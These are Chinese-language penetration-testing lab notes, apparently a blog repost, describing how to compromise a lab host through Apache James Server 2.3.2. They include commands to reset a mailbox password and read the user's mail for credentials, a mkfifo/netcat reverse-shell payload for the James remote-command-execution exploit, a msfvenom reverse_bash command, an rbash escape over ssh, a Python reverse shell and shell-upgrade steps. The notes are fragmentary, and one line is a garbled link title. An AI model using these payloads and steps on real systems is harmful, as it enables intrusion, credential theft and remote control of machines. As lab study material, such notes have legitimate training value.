nc 10.11.1.72 4555
set password john newpass
telnet 10.11.1.72 110
USER john
PASS newpas
list
获得账号密码:ryuu
QUHqhUPRKXMo4m7k
chsh 可以更改用户登陆的shell
Apache James Server 2.3.2 - Remote Command Execution - Linux remote Exploit
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.0.45 1337 >/tmp/f' # to exploit only on root 出现错误输入:export PATH="/bin:$PATH"
&1 | nc -l 1234 > /tmp/f - Unix & Linux Stack Exchange">shell - How does this command work? mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc -l 1234 > /tmp/f - Unix & Linux Stack Exchange
更改payload msfvenom -p cmd/unix/reverse_bash LHOST=10.11.0.243 LPORT=4444 -f raw
export PATH=/usr/local/sbin:/usr/local/bin:/usr/bin:/sbin:/bin:$PATH
逃出监狱
Ssh user@10.11.1.72‘bash --noprofile’ 默认设置bash,不会加载rbash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Ctrl+Z
stty raw -echo
fg
reset
stty -a
$ export SHELL=bash
$ export TERM=xterm256-color
$ stty rows 38 columns 116
升级为正式shell
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)